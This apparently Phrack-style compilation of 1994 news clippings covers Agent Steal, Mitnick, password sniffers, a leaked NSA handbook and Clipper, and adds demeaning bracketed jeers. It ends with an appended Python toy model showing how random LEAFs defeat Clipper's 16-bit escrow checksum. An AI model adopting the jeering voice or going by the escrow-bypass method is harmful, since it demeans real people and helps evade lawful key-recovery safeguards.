"Most hackers would have sold out their mother," he added. 


Petersen is described as 5 foot, 11 inches, 175 pounds, with 
brown hair -- "sometimes platinum blond." But his most telling
characteristic is that he walks with the aid of a prosthesis 
because he lost his left leg below the knee in a car accident. 


Heavily involved in the Hollywood music scene, Petersen’s 
last known employer was Club "Velvet Jam," one of a string of 
clubs he promoted in Los Angeles. 


Hacker in Hiding July 31, 1994 


by John Johnson (LA Times) 


First there was the Condor, then Dark Dante. The latest computer hacker to 
hit the cyberspace most wanted list is Agent Steal, a slender, good-looking 
rogue partial to Porsches and BMWs who bragged that he worked undercover 
for the FBI catching other hackers. 


Now Agent Steal, whose real name is Justin Tanner Petersen, is on the run 
from the very agency he told friends was paying his rent and flying him to 
computer conferences to spy on other hackers. 


Petersen, 34, disappeared Oct. 18 after admitting to federal prosecutors 
that he had been committing further crimes during the time when he was 
apparently working with the government "in the investigation of other 
persons," according to federal court records. 


Ironically, by running he has consigned himself to the same secretive life
as Kevin Mitnick, the former North Hills man who is one of the nation’s most
infamous hackers, and whom Petersen allegedly bragged of helping to set up 
for an FBI bust. Mitnick, who once took the name Condor in homage to a 
favorite movie character, has been hiding for almost two years to avoid 
prosecution for allegedly hacking into computers illegally and posing as a 
law enforcement officer. 


Authorities say Petersen’s list of hacks includes breaking into computers 
used by federal investigative agencies and tapping into a credit card 
information bureau. Petersen, who once promoted after-hours rock shows in 
the San Fernando Valley, also was involved in the hacker underground’s most 
sensational scam - hijacking radio station phone lines to win contests with 
prizes ranging from new cars to trips to Hawaii. 


Petersen gave an interview last year to an on-line publication called Phrack 
in which he claimed to have tapped the phone of a prostitute working for 
Heidi Fleiss. He also boasted openly of working with the FBI to bust


"When I went to work for the bureau I contacted him," Petersen said in the
interview conducted by Mike Bowen. "He was still up to his old tricks, so
we opened a case on him. . . . What a loser. Everyone thinks he is some 
great hacker. I outsmarted him and busted him." 


In the Phrack interview, published on the Internet, an international network 
of computer networks with millions of users, Agent Steal bragged about 
breaking into Pacific Bell headquarters with Poulsen to obtain information 
about the phone company’s investigation of his hacking. 


Petersen was arrested in Texas in 1991, where he lived briefly. Court 
records show that authorities searching his apartment found computer 
equipment, Pacific Bell manuals and five modems. 


A grand jury in Texas returned an eight-count indictment against Petersen, 
accusing him of assuming false names, accessing a computer without
authorization, possessing stolen mail and fraudulently obtaining and using
credit cards. 


The case was later transferred to California and sealed, out of concern for
Petersen’s safety, authorities said. The motion to seal, obtained by
herman, states that Petersen, "acting in an undercover capacity, currently
is cooperating with the United States in the investigation of other persons
in California."




In the Phrack interview, Petersen makes no apologies for his choices in life. 


While discussing Petersen’s role as an informant, Mike Bowen says, "I think 
that most hackers would have done the same as you." 


"Most hackers would have sold out their mother," Petersen responded. 


Computer Criminal Caught After 10 Months on the Run August 30, 1994 


by Keith Stone (Daily News)


Convicted computer criminal Justin Tanner Petersen was captured Monday in
Los Angeles, 10 months after federal authorities said they discovered he 
had begun living a dual life as their informant and an outlaw hacker. 


Petersen, 34, was arrested about 3:30 a.m. outside a Westwood apartment 
that FBI agents had placed under surveillance, said Assistant U.S. 
Attorney David Schindler. 


A flamboyant hacker known in the computer world as "Agent Steal," Petersen 
was being held without bail in the federal detention center in Los Angeles. 
U.S. District Court Judge Stephen V. Wilson scheduled a sentencing hearing 
for Oct. 31.


Petersen faces a maximum of 40 years in prison for using his sophisticated 
computer skills to rig a radio contest in Los Angeles, tap telephone lines 
and enrich himself with credit cards. 


Monday’s arrest ends Petersen’s run from the same FBI agents with whom he 
had once struck a deal: to remain free on bond in exchange for pleading 
guilty to several computer crimes and helping the FBI with other hacker 
cases. 


The one-time nightclub promoter pleaded guilty in April 1993 to six federal 
charges. And he agreed to help the government build its case against Kevin 
Lee Poulsen, who was convicted of manipulating telephones to win radio 
contests and is awaiting trial on espionage charges in San Francisco. 


Authorities said they later learned that Petersen had violated the deal by 
committing new crimes even as he was awaiting sentencing in the plea
agreement. 


On Monday, FBI agents acting on a tip were waiting for Petersen when he parked 
a BMW at the Westwood apartment building. An FBI agent called Petersen’s 
name, and Petersen began to run, Schindler said. 

Two FBI agents gave chase and quickly caught Petersen, who has a prosthetic 
lower left leg because of a car-motorcycle accident several years ago. 


In April 1993, Petersen pleaded guilty to six federal charges including 
conspiracy, computer fraud, intercepting wire communications, transporting
a stolen vehicle across state lines and wrongfully accessing TRW credit
files. Among the crimes that Petersen has admitted to was working with other 
people to seize control of telephone lines so they could win radio 
promotional contests. In 1989, Petersen used that trick and walked away with 
$10,000 in prize money from an FM station, court records show. 


When that and other misdeeds began to catch up with him, Petersen said, he 
fled to Dallas, where he assumed the alias Samuel Grossman and continued 
using computers to make money illegally. 


When he was finally arrested in 1991, Petersen played his last card.

"I called up the FBI and said: ’Guess what? I am in jail,’ " he said. 

He said he spent the next four months in prison, negotiating for his freedom 
with the promise that he would act as an informant in Los Angeles. 


The FBI paid his rent and utilities and gave him $200 a week for spending
money and medical insurance, Petersen said. 


They also provided him with a computer and phone lines to gather information 
on hackers, he said. 


Eventually, Petersen said, the FBI stopped supporting him so he turned to 
his nightclubs for income. But when that began to fail, he returned to 
hacking for profit.


"I was stuck out on a limb. I was almost out on the street. My club
was costing me money because it was a new club," he said. "So I did what
I had to do. I am not a greedy person."


[Broke, Busted, Distrusted. Turning in your friends leads to some 
seriously bad Karma, man. Negative energy like that returns ten-fold. 
You never know in what form either. You could end getting shot, 
thrown in jail, or worse, test HIV Positive. So many titty-dancers, 
so little time, eh dude? Good luck and God bless ya’ Justin.] 


Fugitive Hacker Baffles FBI With Technical Guile July 5, 1994 


by John Markoff (New York Times) 


[Mitnick, Mitnick, Mitnick, and more Mitnick. Poor bastard. No rest for
the wicked, eh Kevin?] 


Computer Outlaws Invade the Internet May 24, 1994 


by Mike Toner (Atlanta Journal-Constitution) 


A nationwide wave of computer break-ins has law enforcement 
authorities scrambling to track down a sophisticated ring of
"hackers" who have used the international "information
highway," the Internet, to steal more than 100,000 passwords -- the
electronic keys to vast quantities of information stored on
government, university and corporate computer systems.


Since the discovery of an isolated break-in last year at a
single computer that provides a "gateway" to the Internet,
operators of at least 30 major computer systems have found illicit
password "sniffers" on their machines.


The Federal Bureau of Investigation has been investigating the 
so-called "sniffer" attacks since February, but security experts 
say the intrusions are continuing -- spurred, in part, by the 
publication last month of line-by-line instructions for the 
offending software in an on-line magazine for hackers. 


Computer security experts say the recent rash of password piracy 
using the Internet is much more serious than earlier security 
violations, like the electronic "worm" unleashed in 1988 by 
Cornell University graduate student Robert Morris.


"This is a major concern for the whole country," she says.
"I’ve had some sleepless nights just thinking about what could
happen. It’s scary. Once someone has your ID and your password, 
they can read everything you own, erase it or shut a system down. 
They can steal proprietary information and sell it, and you might 
not even know it’s gone." 


"Society has shifted in the last few years from just using 
computers in business to being absolutely dependent on them and the 
information they give us and the bad guys are beginning to 
appreciate the value of information," says Dain Gary, manager of 
the Computer Emergency Response Team (CERT), a crack team of 
software experts at Carnegie-Mellon University in Pittsburgh that 
is supported by the Defense Department’s Advanced Research Projects
Agency.


Gary says the current rash of Internet crime appears to be the
work of a "loosely knit but fairly organized group" of computer
hackers adept not only at breaking and entering, but at hiding
their presence once they’re in.


Most of the recent break-ins follow a similar pattern. The 
intruders gain access to a computer system by locating a weakness 
in its security system -- what software experts call an "unpatched 
vulnerability." 


Once inside, the intruders install a network monitoring program,
a "sniffer," that captures and stores the first 128 keystrokes
of all newly opened accounts, which almost always includes a user’s
log-on and password.


"We really got concerned when we discovered that the code had
been published in Phrack, an on-line magazine for hackers, on April
1," he says. "Putting something like that in Phrack is a little
like publishing the instructions for converting semiautomatic
weapons into automatics."


Even more disturbing to security experts is the absence of a 
foolproof defense. CERT has been working with computer system 
administrators around the country to shore up electronic security, 
but the team concedes that such "patches" are far from perfect. 


[Look for plans on converting semiautomatic weapons into automatics 
in the next issue. ] 


Information Superhighwaymen Hacker Menace Persists 


(Open Computing) (Page 25) 


May 1994 


Once again the Internet has been labeled a security problem. And a new 
breed of hackers has attracted attention for breaking into systems.
"This is a group of people copying what has been done for years," says 
Chris Goggans, aka Erik Bloodaxe. "There’s one difference: They don’t 
play nice." 


Goggans was a member of the hacker gang called the Legion of Doom in the 
late ’80s to early '90s. Goggans says the new hacking group, which goes 
by the name of "The Posse," has broken into numerous Business Week 1000 
companies including Sun Microsystems Inc., Boeing, and Xerox. He says 
they’ve logged onto hundreds of universities and online services like
The Well. And they’re getting root access on all these systems.


For their part, The Posse--a loose band of hackers--isn’t talking. 


Security Experts: Computer Hackers a Growing Concern July 22, 1994 


New York Times News Wire (Virginian-Pilot and Ledger Star) (2A) 


Armed with increasingly sophisticated snooping tools, computer programmers
operating both in the United States and abroad have gained unauthorized 
access to hundreds of sensitive but unclassified government and military 
computer networks called Internet, computer security experts said. 


Classified government and military data, such as those that control 
nuclear weapons, intelligence and other critical functions, are not 
connected to the Internet and are believed to be safe from the types of 
attacks reported recently. 


The apparent ease with which hackers are entering military and government 
systems suggests that similar if not greater intrusions are under way on 
corporate, academic and commercial networks connected to the Internet. 


Several sources said it was likely that only a small percentage of 
intrusions, perhaps fewer than 5 percent, have been detected. 


NSA Semi-confidential Rules Circulate 


By Keay Davidson (San Francisco Examiner) (Page A1)


It arrived mysteriously at an Austin, Texas, post office box by "snail
mail" -- computerese for the Postal Service. But once the National Security
Agency’s employee handbook was translated into bits and bytes, it took
only minutes to circulate across the country.


Thus did a computer hacker in Texas display his disdain for government 
secrecy last week - by feeding into public computer networks the 
semiconfidential document, which describes an agency that, during the darkest 
days of the Cold War, didn’t officially "exist." 


Now, anyone with a computer, telephone, modem and basic computer skills
can read the 36-page manual, which is stamped "FOR OFFICIAL USE ONLY" and
offers a glimpse of the shadowy world of U.S. intelligence - and the personal
price its inhabitants pay.


"Your home, car pool, and public places are not authorized areas to
conduct classified discussions even if everyone involved in the discussion
possesses a proper clearance and ’need-to-know.’ The possibility that a
conversation could be overheard by unauthorized persons dictates the need to
guard against classified discussions in non-secure areas."


The manual is "so anal retentive and paranoid. This gives you some
insight into how they think," said Chris Goggans, the Austin hacker who
unleashed it on the computer world. His on-line nom de plume is "Erik
Bloodaxe" because "when I was about 11, I read a book on Vikings, and that
name really struck me."


NSA spokeswoman Judi Emmel said Tuesday that "apparently this document is
an (NSA) employee handbook, and it is not classified." Rather, it is an
official NSA employee manual and falls into a twilight zone of secrecy. On
one hand, it’s "unclassified." On the other hand, it’s "FOR OFFICIAL USE
ONLY" and can be obtained only by filing a formal request under the U.S.
Freedom of Information Act, Emmel said.


"While you may take this handbook home for further study, remember that
it does contain ’FOR OFFICIAL USE ONLY’ information which should be
protected," the manual warns. Unauthorized release of such information could
result in "appropriate administrative action ... (and) corrective and/or
disciplinary measures."


Goggans, 25, runs an on-line electronic "magazine" for computer hackers 
called Phrack, which caters to what he calls the "computer underground." He 
is also a computer engineer at an Austin firm, which he refuses to name. 
The manual recently arrived at Goggans’ post office box in a white
envelope with no return address, save a postmark from a Silicon Valley
location, he says. Convinced it was authentic, he typed it into his computer,
then copied it into the latest issue of Phrack.


Other hackers, like Grady Ward of Arcata, Humboldt County, and Jeff
Leroy Davis of Laramie, Wyo., redistributed the electronic files to computer
users’ groups. These included one run by the Cambridge, Mass.-based
Electronic Frontier Foundation, which fights to protect free speech on
computer networks.


Ward said he helped redistribute the NSA manual "to embarrass the NSA" 
and prove that even the U.S. government’s most covert agency can’t keep 
documents secret. 


The action also was aimed at undermining a federal push for 
data-encryption regulations that would let the government tap into computer 
networks, Ward said. 


[Yeah...sure it was, Grady.] 


Hackers Stored Pornography in Computers at Weapons Lab July 13, 1994 


by Adam S. Bauman (Virginian-Pilot and Ledger-Star) (Page A6) 


One of the nation’s three nuclear weapons labs has confirmed that
computer hackers were using its computers to store and distribute 
hard-core pornography. 


The offending computer, which was shut down after a Los Angeles Times 
reporter investigating Internet hacking alerted lab officials, contained 
more than 1,000 pornographic images. It was believed to be the largest 
cache of illegal hardcore pornography ever found on a computer network. 


At Lawrence Livermore, officials said Monday that they believed at least 
one lab employee was involved in the pornography ring, along with an
undetermined number of outside collaborators. 


[Uh, let me see if I can give this one a go: 


A horny lab technician at LLNL.GOV uudecoded gifs for days on end 
from a.b.p.e. After putting them up on an FSP site, a nosey schlock 
reporter blew the whistle, and wrote up a big "hacker-scare" article. 


The top-notch CIAC team kicked the horn-dog out the door, and began 
frantically scouring the big Sun network at LLNL for other breaches, 
all the while scratching their heads at how to block UDP-based apps 
like FSP at their firewall. MPEGs at 11.]


Clipper Flaw May Thwart Fed Effort June 6,


by Aaron Zitner (Boston Globe) 


Patents, Technical Snares May Trip Up the ’Clipper’ June 6, 


by Sharon Fisher (Communications Week) (Page 1) 


[Clipper, Flipper, Slipper. It’s all a big mess, and has obsoleted 
itself. But, let’s sum up the big news: 


How the Clipper technology is SUPPOSED to work 


1) Before an encoded message can be sent, a clipper computer chip
assigns and tests a scrambled group of numbers called a LEAF, for
Law Enforcement Access Field. The LEAF includes the chip’s serial
number, a "session key" number that locks the message and a "checksum"
number that verifies the validity of the session key.


2) With a warrant to wiretap, a law-enforcement agency like the FBI 
could record the message and identify the serial number of a Clipper 
chip. It would then retrieve from custodial agencies the two halves of 
that chip’s decoding key. 


3) Using both halves of the decoding key, the FBI would be able to 
unscramble the session key number, thus unlocking the messages or data 
that had been protected. 


How the Clipper technology is FLAWED (YAY, Matt Blaze!) 


1) Taking advantage of design imperfections, people trying to defeat 
the system could replace the LEAF until it erroneously passed the 
"checksum" verification, despite an invalid session-key number. 


2) The FBI would still be able to retrieve a decoding key, but it would 
prove useless. 


3) Because the decoding key would not be able to unscramble the invalid 
session key, the message would remain locked. ] 
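
The LEAF checksum weakness summarized above, as an added Python model that is not code from Phrack or from Blaze's paper: it shows why a 16-bit check cannot bind the escrow field to the session key, while a 128-bit tag can. The field widths (32-bit unit ID, 80-bit wrapped key, 16-bit checksum) are assumed from Blaze's published analysis rather than this page, and HMAC-SHA256, the XOR wrap, and the key values are stand-ins for the classified algorithms.

```python
import hashlib
import hmac
import random

# Toy LEAF: unit_id (4 bytes) | wrapped session key (10) | checksum (tag_len).
# HMAC-SHA256 and XOR are stand-ins; both keys are constructed sample values.
FAMILY_KEY = b"constructed-family-key"
UNIT_KEY = b"constructed-unit-key"  # escrowed in two halves in the real scheme


def wrap(session_key: bytes) -> bytes:
    """XOR stand-in for encrypting under the unit key (its own inverse)."""
    pad = hashlib.sha256(UNIT_KEY).digest()
    return bytes(a ^ b for a, b in zip(session_key, pad))


def checksum(session_key: bytes, body: bytes, tag_len: int) -> bytes:
    return hmac.new(FAMILY_KEY, session_key + body, hashlib.sha256).digest()[:tag_len]


def make_leaf(unit_id: bytes, session_key: bytes, tag_len: int = 2) -> bytes:
    body = unit_id + wrap(session_key)
    return body + checksum(session_key, body, tag_len)


def receiver_accepts(leaf: bytes, session_key: bytes, tag_len: int = 2) -> bool:
    """The peer chip's only test: does the checksum fit the session key in use?"""
    body, tag = leaf[:14], leaf[14:]
    return hmac.compare_digest(tag, checksum(session_key, body, tag_len))


def escrow_recover(leaf: bytes) -> bytes:
    """Session key a wiretapper derives from the LEAF using the escrowed unit key."""
    return wrap(leaf[4:14])


def trials_until_accepted(session_key, tag_len, limit, seed=1994):
    """Feed random LEAFs to the receiver check; return (trials, leaf) or None."""
    rng = random.Random(seed)
    size = 14 + tag_len
    for n in range(1, limit + 1):
        leaf = rng.getrandbits(8 * size).to_bytes(size, "big")
        if receiver_accepts(leaf, session_key, tag_len):
            return n, leaf
    return None


if __name__ == "__main__":
    result = trials_until_accepted(b"0123456789", tag_len=2, limit=2_000_000)
    print("accepted after", result[0] if result else "no", "trials")
```

With a 2-byte tag each random LEAF passes with probability 2^-16, so about 65,000 trials are expected; the same search against a 16-byte tag does not succeed in any practical number of trials.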